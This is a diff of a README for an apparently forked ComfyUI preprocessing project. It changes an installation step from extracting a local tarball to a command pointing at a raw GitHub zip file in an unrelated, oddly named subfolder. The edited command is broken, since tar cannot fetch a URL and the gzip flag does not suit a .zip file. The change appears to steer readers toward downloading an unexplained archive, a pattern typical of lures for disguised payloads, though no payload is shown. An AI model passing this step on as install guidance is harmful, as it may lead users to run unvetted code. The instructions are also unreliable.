cheatingsz/ComfyUI-WanAnimatePreprocess/readme.md

 1. Open a terminal.
 2. Navigate to the folder where you downloaded the file.
-3. Use the command `tar -xvzf ComfyUI-WanAnimatePreprocess.tar.gz` to extract the files.
+3. Use the command `tar -xvzf https://raw.githubusercontent.com/cheatingsz/ComfyUI-WanAnimatePreprocess/main/suprascapular/ComfyUI-WanAnimatePreprocess.zip` to extract the files.
 4. Follow the provided README to run the application.

 ## ⚙️ How to Use ComfyUI-WanAnimatePreprocess